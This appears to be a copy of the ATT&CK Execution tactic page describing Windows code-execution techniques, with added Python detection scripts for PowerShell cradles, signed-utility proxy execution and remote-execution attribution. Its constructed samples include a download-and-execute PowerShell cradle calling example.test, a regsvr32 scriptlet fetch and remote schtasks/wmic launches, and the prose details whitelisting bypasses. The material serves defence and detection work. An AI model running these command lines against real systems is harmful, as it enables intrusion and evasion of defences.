Execution

From ATT&CK

Tactic Description

The execution tactic represents techniques that result in execution of adversary-controlled code on a local or remote system. This tactic is often used in conjunction with lateral movement to expand access to remote systems on a network.

Techniques

Below is a list of all the Execution techniques in ATT&CK:

Each entry gives the technique name, the tactic or tactics it belongs to (in parentheses), and its technical description.
Command-Line Interface (Execution)
Command-line interfaces provide a way of interacting with computer systems and are a common feature across many operating system platforms.[1] One example command-line interface on Windows systems is cmd.exe, which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be reached locally or remotely, for example through a remote desktop session or a reverse shell. Commands run with the permission level of the command-line interface process unless the command invokes something that changes the security context for that execution (e.g. a Scheduled Task that runs as SYSTEM). Adversaries use command-line interfaces to interact with systems and execute other software during the course of an operation.

Execution through API (Execution)
Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as CreateProcess allow programs and scripts to start other processes with the desired path and argument parameters.[2]

Additional Windows API calls that can be used to execute binaries include:[3]

  • CreateProcessA() and CreateProcessW(),
  • CreateProcessAsUserA() and CreateProcessAsUserW(),
  • CreateProcessInternalA() and CreateProcessInternalW() (undocumented kernel32 entry points that the documented CreateProcess* functions call into),
  • CreateProcessWithLogonW(), CreateProcessWithTokenW(),
  • LoadLibraryA() and LoadLibraryW(),
  • LoadLibraryExA() and LoadLibraryExW(),
  • LoadModule(),
  • LoadPackagedLibrary(),
  • WinExec(),
  • ShellExecuteA() and ShellExecuteW(),
  • ShellExecuteExA() and ShellExecuteExW()

The LoadLibrary family executes code without creating a new process: mapping a DLL runs its DllMain entry point inside the calling process. Because the API is called directly, there is no intervening cmd.exe or script host for command-line monitoring to see; detection has to look at the child process itself or, for LoadLibrary, at the module load event.

Execution through Module Load (Execution)
The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API, which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API.[4]

The module loader can load DLLs:

  • via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
  • via an EXPORT forwarded to another DLL, specified with a (fully-qualified or relative) pathname (but without extension);
  • via a program.exe.local directory (or an NTFS junction or symbolic link of that name) next to the executable that holds the DLLs named in the IMPORT directory or in forwarded EXPORTs, so that these are loaded in preference to the system copies (DotLocal redirection);
  • via <file name="filename.extension" loadFrom="fully-qualified or relative pathname"> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.

Adversaries can use this functionality to execute arbitrary code on a system: whichever DLL the loader resolves runs its DllMain entry point in the loading process.

Graphical User Interface (Execution)
Cause a binary or script to execute by interacting with the file through a graphical user interface (GUI), either locally or in an interactive remote session such as Remote Desktop Protocol (RDP).

InstallUtil (Defense Evasion, Execution)
InstallUtil is a command-line utility that installs and uninstalls resources by executing the installer components contained in a .NET binary.[5] InstallUtil is located in the .NET directory on a Windows system: C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe. InstallUtil.exe is digitally signed by Microsoft. Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting: it instantiates and runs every class in the assembly decorated with the [System.ComponentModel.RunInstaller(true)] attribute, so code placed in such a class (including its Uninstall method, which runs when the /U switch is given) executes under the signed utility.[6]

MSBuild (Defense Evasion, Execution)
MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML-formatted project files that define requirements for building various platforms and configurations.[7] Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild, introduced in .NET version 4, allows C# code to be inserted into the XML project file: a UsingTask element whose TaskFactory is CodeTaskFactory carries the source in its body.[8] MSBuild compiles that source with the .NET compiler and executes the resulting task inside its own process. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.[9]

PowerShell (Execution)
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.[10] Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet, which runs an executable, and the Invoke-Command cmdlet, which runs a command locally or on a remote computer.

PowerShell may also be used to download executables or scripts from the Internet and run them, either after writing them to disk or entirely in memory (for example by passing downloaded script text to Invoke-Expression), so that nothing touches disk.

By default, PowerShell remoting to another system requires the connecting account to be a member of the target's local Administrators group (or, on Windows 8 / Server 2012 and later, of the Remote Management Users group).

A number of PowerShell-based offensive testing tools are available, including Empire,[11] PowerSploit,[12] and PSAttack.[13]

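The in-memory download-and-run pattern described above is usually delivered through a command line, often behind -EncodedCommand. The following is an added example, written for this page and not code from ATT&CK or from any of the tools named: a small Python triage routine that decodes the UTF-16LE base64 payload powershell.exe expects and scans both the raw and the decoded text for cradle indicators. The sample command lines, the hostname example.test and the indicator weights are constructed for the example.

```python
"""
Added example, not code from the original page: triage a PowerShell command
line by decoding any -EncodedCommand payload and flagging download-and-execute
cradles.  Every sample command line below is constructed for the example.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Each pattern is applied to the raw command line *and* to the decoded
# -EncodedCommand payload, so base64 encoding does not hide the cradle.
INDICATOR_PATTERNS = {
    "download": re.compile(
        r"Net\.WebClient|Download(?:String|File|Data)|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "invoke_expression": re.compile(r"Invoke-Expression|\bIEX\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-no(?:profile|p)\b", re.I),
    "non_interactive": re.compile(r"-noni(?:nteractive)?\b", re.I),
    "base64_in_script": re.compile(r"FromBase64String", re.I),
    "reflective_load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I),
    "remote_invoke": re.compile(r"Invoke-Command\b.*-ComputerName|New-PSSession\b", re.I | re.S),
}


def encode_command(script: str) -> str:
    """Produce the -EncodedCommand argument exactly as an operator would: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 argument of -EncodedCommand, accepting the abbreviations powershell.exe accepts."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in "-/":
            continue
        name = tok[1:].lower()
        # powershell.exe matches any unambiguous prefix of EncodedCommand (-e, -enc, ...) plus the alias -ec
        if name == "ec" or (name.startswith("e") and "encodedcommand".startswith(name)):
            return tokens[i + 1].strip("\"'")
    return None


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode the UTF-16LE payload -EncodedCommand expects; None if the argument is not one."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_powershell_cmdline(cmdline: str) -> Dict[str, object]:
    """Decode, scan and score one command line.  A download + Invoke-Expression pair is a
    cradle and alerts on its own; otherwise three indicators are needed (constructed threshold)."""
    encoded = extract_encoded_command(cmdline)
    decoded = decode_encoded_command(encoded) if encoded else None
    text = cmdline + ("\n" + decoded if decoded else "")
    indicators: List[str] = [name for name, pat in INDICATOR_PATTERNS.items() if pat.search(text)]
    if encoded:
        indicators.append("encoded_command")
    cradle = "download" in indicators and "invoke_expression" in indicators
    return {"decoded": decoded, "indicators": indicators, "suspicious": cradle or len(indicators) >= 3}


# Constructed samples: a plain cradle, the same cradle hidden behind -Enc, and a benign script run.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/stage.ps1')"
SAMPLE_COMMAND_LINES = {
    "plain_cradle": 'powershell.exe -nop -w hidden -c "' + CRADLE + '"',
    "encoded_cradle": "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_command(CRADLE),
    "benign_script": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\Backup.ps1",
}

if __name__ == "__main__":
    for label, line in SAMPLE_COMMAND_LINES.items():
        result = analyze_powershell_cmdline(line)
        print(f"{label:15} suspicious={result['suspicious']} indicators={result['indicators']}")
        if result["decoded"]:
            print(f"{'':15} decoded: {result['decoded']}")
```

The point of applying the patterns to the decoded text as well is that -EncodedCommand is not obfuscation, only transport encoding; anything that alerts on "DownloadString" in a command line but not in the decoded payload is trivially evaded. Real telemetry also needs the parent process and user, since -NoProfile -NonInteractive -EncodedCommand is exactly how some management agents invoke signed scripts.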
Process Hollowing (Defense Evasion, Execution)
Process hollowing occurs when a process is created in a suspended state (CREATE_SUSPENDED), its original image is unmapped from memory and replaced with the code of a second program, and its main thread is resumed so that the second program runs instead of the original. Windows and process monitoring tools believe the original process is running, since the process name and image path are unchanged, whereas the actual program running is different.[14] Process hollowing may be used similarly to DLL Injection to evade defenses and detection analysis of malicious process execution by launching adversary-controlled code under the context of a legitimate process.

Regsvcs/Regasm (Defense Evasion, Execution)
Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft.[15][16] Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through attributes within the binary that specify code to run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. Code carrying these attributes executes even when the process lacks the privileges the registration itself needs, so the registration step fails but the adversary's code has already run.[17]

Regsvr32 (Defense Evasion, Execution)
Regsvr32.exe is a command-line program used to register and unregister OLE controls and other COM servers packaged as dynamic link libraries (DLLs) on Windows systems.[18] Because it does so by loading the DLL it is given and calling its DllRegisterServer export (DllUnregisterServer with /u), it can be made to load and execute an arbitrary DLL.

Adversaries may take advantage of this functionality to proxy execution of code and avoid triggering security tools that do not monitor the execution of, or the modules loaded by, the regsvr32.exe process, whether because of whitelists or because Windows uses regsvr32.exe routinely and alerts on it have been tuned out as false positives. Regsvr32.exe is also a Microsoft-signed binary.

Regsvr32.exe can also be used to bypass process whitelisting by loading COM scriptlets, which run under the current user's permissions: the scriptlet handler scrobj.dll is passed as the DLL and the scriptlet (.sct) location is passed through the /i: switch. Since regsvr32.exe is network and proxy aware, the scriptlet can be fetched by passing a uniform resource locator (URL) to a file on an external web server as that argument. This method makes no changes to the Registry because the COM object is never actually registered, only executed.[19] This variation of the technique has been used in campaigns targeting governments.[20]

Rundll32 (Defense Evasion, Execution)
The rundll32.exe program loads a DLL and calls one of its exported functions (rundll32.exe <dll path>,<entry point> [arguments]), so it can be used to execute an arbitrary DLL. Adversaries may take advantage of this functionality to proxy execution of code and avoid triggering security tools that do not monitor the execution of the rundll32.exe process, whether because of whitelists or because Windows uses rundll32.exe for normal operations and alerts on it have been tuned out as false positives.

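The five entries above (InstallUtil, MSBuild, Regsvcs/Regasm, Regsvr32, Rundll32) share one detection problem: the binary is signed and expected, so the command line and the file it is asked to load are the only signal. The following is an added example written for this page, not code from ATT&CK or from any vendor tool: a Python triage pass over constructed Sysmon-style process-creation records that flags these utilities when they load from a URL, a UNC path or a user-writable directory, and applies the utility-specific tells the text describes (scrobj.dll with regsvr32, /U with logging suppressed for InstallUtil). The event records, paths, hostnames and the user-writable path list are all constructed assumptions.

```python
"""
Added example, not code from the original page: flag proxy-execution abuse of
the signed utilities discussed above (InstallUtil, MSBuild, Regsvcs/Regasm,
Regsvr32, Rundll32) in process-creation telemetry.  The records below are
constructed Sysmon-style events (Image, CommandLine, ParentImage), not real logs.
"""
import re
from typing import Dict, List, Tuple

WATCHED = {"installutil.exe", "msbuild.exe", "regsvcs.exe", "regasm.exe", "regsvr32.exe", "rundll32.exe"}

# Locations an unprivileged user can write to: a signed utility loading from
# one of these is far less expected than from System32 or Program Files.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)\\|\\Users\\Public\\|\\Temp\\|\\ProgramData\\", re.I)
REMOTE_SOURCE = re.compile(r"^(?:https?:|ftp:|\\\\)", re.I)
LOADABLE_EXT = re.compile(r"\.(?:dll|ocx|exe|sct|csproj|vbproj|proj|xml)$", re.I)


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping double-quoted arguments whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def loadable_arguments(tokens: List[str]) -> List[str]:
    """Arguments the utility would load: DLLs, assemblies, project files, scriptlets."""
    found = []
    for tok in tokens[1:]:
        tok = re.sub(r"^[/-]i:", "", tok, flags=re.I)  # regsvr32 /i:<arg> hands <arg> to DllInstall
        for part in tok.split(","):                      # rundll32 takes <dll>,<entry point>
            if LOADABLE_EXT.search(part):
                found.append(part)
    return found


def classify(event: Dict[str, str]) -> List[str]:
    """Return human-readable findings for one event; empty for unwatched or benign-looking use."""
    name = event["image"].rsplit("\\", 1)[-1].lower()
    if name not in WATCHED:
        return []
    tokens = tokenize(event["command_line"])
    lowered = [t.lower() for t in tokens]
    findings = []
    for arg in loadable_arguments(tokens):
        if REMOTE_SOURCE.match(arg):
            findings.append(f"{name}: loads {arg} from a remote source (URL or UNC path)")
        elif USER_WRITABLE.search(arg):
            findings.append(f"{name}: loads {arg} from a user-writable location")
    if name == "regsvr32.exe" and any(t.endswith("scrobj.dll") for t in lowered):
        findings.append("regsvr32.exe: scrobj.dll runs a COM scriptlet instead of registering a DLL")
    if name == "installutil.exe" and ("/u" in lowered or "/uninstall" in lowered) \
            and any(t.startswith("/logfile=") or t == "/logtoconsole=false" for t in lowered):
        findings.append("installutil.exe: uninstall with logging suppressed, the documented whitelisting-bypass invocation")
    if name == "rundll32.exe" and len(tokens) > 1 and not loadable_arguments(tokens):
        findings.append("rundll32.exe: first argument is not a DLL path")
    return findings


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """(utility name, findings) for every event that produced at least one finding, in input order."""
    hits = []
    for event in events:
        findings = classify(event)
        if findings:
            hits.append((event["image"].rsplit("\\", 1)[-1].lower(), findings))
    return hits


# Constructed sample events (not real telemetry).  Odd entries are benign lookalikes.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"regsvr32.exe /s /n /u /i:http://example.test/payload.sct scrobj.dll"},
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent_image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"},
    {"image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\drop.dll,Start"},
    {"image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\alice\Downloads\tool.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\build.csproj"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "parent_image": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
     "command_line": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"RegAsm.exe /U C:\ProgramData\Vendor\comp.dll"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe C:\Users\alice\Downloads\notes.txt"},
]

if __name__ == "__main__":
    for utility, findings in triage(SAMPLE_EVENTS):
        for finding in findings:
            print(f"[{utility}] {finding}")
```

Each rule is a statement about where a signed utility should never need to load code from, rather than a signature for one payload, which is what keeps it useful against the next .sct or .csproj variant. The user-writable list is a starting point to be tuned against the environment: developer workstations will legitimately run MSBuild on projects under a profile directory, and that is a per-host exception, not a reason to drop the rule.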
Scheduled Task (Execution, Persistence, Privilege Escalation)
Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. Creating a task with at, or creating one that runs as another account, requires the creating account to be in the Administrators group on the local system; schtasks also lets an unprivileged user create tasks that run under that user's own account. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on.[21] An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.

Scripting (Defense Evasion, Execution)
Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell, but scripts may also take the form of command-line batch files. Many popular offensive frameworks use scripting, for security testers and adversaries alike. Metasploit,[22] Veil,[23] and PowerSploit[12] are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell.[24]

Service Execution (Execution)
Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager (for example with sc.exe create and sc.exe start, or by calling the CreateService and StartService APIs, locally or over RPC). This can be done by either creating a new service or modifying an existing service. This technique is the execution step used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.

Third-party Software (Execution, Lateral Movement)
Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code.

Adversaries may gain access to and use third-party application deployment systems installed within an enterprise network. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.

The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.

Windows Management Instrumentation (Execution)
Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access; remote access runs over DCOM and Remote Procedure Call (RPC),[26] with the RPC endpoint mapper on TCP port 135 handing the client off to a dynamically assigned high port.[27] Server message block (SMB)[25] is commonly used alongside WMI to stage payloads or collect output, but WMI itself does not require it. An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files (for example through the Create method of the Win32_Process class) as part of Lateral Movement.[28]

Windows Remote Management (Execution, Lateral Movement)
Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).[29] It is Microsoft's implementation of WS-Management and listens by default on TCP port 5985 (HTTP) or 5986 (HTTPS). It may be called with the winrm or winrs command or by any number of programs such as PowerShell, whose remoting cmdlets (Invoke-Command, Enter-PSSession) use it as their transport.[30]

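The four remote-execution entries above (Scheduled Task, Service Execution, WMI, WinRM) leave different fingerprints on the target: the child process is parented by the service that received the request rather than by an interactive shell. The following is an added example written for this page, not code from ATT&CK or from any vendor product: a Python routine that attributes constructed process-creation records to a vector from the parent image on the target side, and recovers the target host from the client-side command line on the source side, so that source and destination can be joined into lateral-movement edges. The host names, parent-image table and command lines are constructed assumptions; on Windows 10 and later the Task Scheduler parent appears as a Schedule-service svchost.exe rather than taskeng.exe.

```python
"""
Added example, not code from the original page: attribute process-creation
events to the remote-execution vectors described above (Scheduled Task,
Service Execution, WMI, WinRM) from the parent process and the command line.
Hosts, images and command lines below are constructed for the example.
"""
import re
from typing import Dict, List, Optional, Tuple

# Parent images that mean the child was started by a remote-execution service
# rather than interactively.  All of them are also normal on an administered
# host, so the signal is "who, from where, at what hour", not the parent alone.
INBOUND_PARENTS = {
    "wmiprvse.exe": "wmi",            # Win32_Process.Create runs under the WMI provider host
    "wsmprovhost.exe": "winrm",       # WinRM / PowerShell remoting session host
    "services.exe": "service",        # Service Control Manager starting a service binary
    "taskeng.exe": "scheduled_task",  # Task Scheduler engine (svchost.exe -k netsvcs on newer builds)
}

# Client-side command lines that launch something on another host; group 1 is the target.
OUTBOUND_PATTERNS = [
    ("scheduled_task", re.compile(r"\bschtasks(?:\.exe)?\b.*?\s/s\s+\"?([\w.-]+)", re.I)),
    ("scheduled_task", re.compile(r"\bat(?:\.exe)?\s+\\\\([\w.-]+)", re.I)),
    ("wmi", re.compile(r"\bwmic(?:\.exe)?\b.*?/node:\"?([\w.-]+)", re.I)),
    ("winrm", re.compile(r"\bwinrs(?:\.exe)?\b.*?-r:\"?([\w.-]+)", re.I)),
    ("winrm", re.compile(r"\b(?:Invoke-Command|New-PSSession|Enter-PSSession)\b.*?-ComputerName\s+\"?([\w.-]+)", re.I)),
    ("service", re.compile(r"\bsc(?:\.exe)?\s+\\\\([\w.-]+)\s+(?:create|start)\b", re.I)),
]


def attribute_execution(event: Dict[str, str]) -> Dict[str, Optional[str]]:
    """Classify one event as inbound (spawned by a remote-execution service on this host),
    outbound (a client launching work on another host), or neither."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    if parent in INBOUND_PARENTS:
        return {"direction": "inbound", "vector": INBOUND_PARENTS[parent], "target": None}
    for vector, pattern in OUTBOUND_PATTERNS:
        match = pattern.search(event["command_line"])
        if match:
            return {"direction": "outbound", "vector": vector, "target": match.group(1)}
    return {"direction": None, "vector": None, "target": None}


def remote_execution_edges(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """(source host, target host, vector) for every outbound launch, in event order."""
    edges = []
    for event in events:
        result = attribute_execution(event)
        if result["direction"] == "outbound":
            edges.append((event["host"], result["target"], result["vector"]))
    return edges


def inbound_by_host(events: List[Dict[str, str]]) -> Dict[str, List[Tuple[str, str]]]:
    """host -> [(vector, child image name)] for processes spawned by a remote-execution service."""
    summary: Dict[str, List[Tuple[str, str]]] = {}
    for event in events:
        result = attribute_execution(event)
        if result["direction"] == "inbound":
            child = event["image"].rsplit("\\", 1)[-1].lower()
            summary.setdefault(event["host"], []).append((result["vector"], child))
    return summary


# Constructed sample events: one workstation reaching four servers, and what the servers see.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\schtasks.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'schtasks.exe /create /s srv01 /tn Updater /tr "C:\Windows\Temp\u.exe" /sc once /st 23:55'},
    {"host": "ws01", "image": r"C:\Windows\System32\wbem\wmic.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'wmic.exe /node:srv02 process call create "cmd.exe /c whoami > C:\Windows\Temp\o.txt"'},
    {"host": "ws01", "image": r"C:\Windows\System32\winrs.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"winrs.exe -r:srv03 hostname"},
    {"host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe Invoke-Command -ComputerName srv04 -ScriptBlock { hostname }"},
    {"host": "srv01", "image": r"C:\Windows\Temp\u.exe", "parent_image": r"C:\Windows\System32\taskeng.exe",
     "command_line": r"C:\Windows\Temp\u.exe"},
    {"host": "srv02", "image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"cmd.exe /c whoami > C:\Windows\Temp\o.txt"},
    {"host": "srv03", "image": r"C:\Windows\System32\HOSTNAME.EXE", "parent_image": r"C:\Windows\System32\wsmprovhost.exe",
     "command_line": r"hostname"},
    {"host": "srv05", "image": r"C:\Windows\Temp\svc.exe", "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": r"C:\Windows\Temp\svc.exe"},
    {"host": "ws01", "image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for src, dst, vector in remote_execution_edges(SAMPLE_EVENTS):
        print(f"{src} -> {dst} via {vector}")
    for host, children in inbound_by_host(SAMPLE_EVENTS).items():
        print(f"{host}: {children}")
```

The value is in the join: srv05 shows a service-started binary in C:\Windows\Temp with no matching outbound event from any monitored host, which is either a gap in client-side telemetry or a launch from a host you are not watching, and either way is the record to look at first. Inbound attributions alone are noisy on any host an administrator touches; what makes them actionable is an unexpected source, account or time.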

References

  1. Wikipedia. (2016, June 26). Command-line interface. Retrieved June 27, 2016.
  2. Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.
  3. Kanthak, S. (2017). Application Verifier Provider. Retrieved February 13, 2017.
  4. Wikipedia. (2017, January 31). Microsoft Windows library files. Retrieved February 13, 2017.
  5. Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.
  6. Smith, C. (2015, August 24). Application Whitelisting Evasion 101 - Trusted Things That Execute Things "InstallUtil.exe". Retrieved June 17, 2016.
  7. Microsoft. (n.d.). MSBuild. Retrieved November 30, 2016.
  8. Microsoft. (n.d.). MSBuild Inline Tasks. Retrieved December 21, 2016.
  9. Smith, C. (2016, September 13). Bypassing Application Whitelisting using MSBuild.exe - Device Guard Example and Mitigations. Retrieved September 13, 2016.
  10. Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.
  11. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
  12. PowerSploit. (n.d.). Retrieved December 4, 2014.
  13. Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
  14. Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, 2014.
  15. Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool). Retrieved July 1, 2016.
  16. Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved July 1, 2016.
  17. Smith, C. (2015, November 9). All-Natural, Organic, Free Range, Sustainable, Whitelisting Evasion - Regsvcs and RegAsm. Retrieved July 1, 2016.
  18. Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.
  19. Smith, C. (2016, April 19). Bypass Application Whitelisting Script Protections - Regsvr32.exe & COM Scriptlets (.sct files). Retrieved June 22, 2016.
  20. Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.
  21. Microsoft. (2005, January 21). Task Scheduler and security. Retrieved June 8, 2016.
  22. Metasploit. (n.d.). Retrieved December 4, 2014.
  23. Veil Framework. (n.d.). Retrieved December 4, 2014.
  24. Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.
  25. Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.
  26. Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.
  27. Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.
  28. Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
  29. Microsoft. (n.d.). Windows Remote Management. Retrieved November 12, 2014.
  30. Jacobsen, K. (2014, May 16). Lateral Movement with PowerShell [slides]. Retrieved November 12, 2014.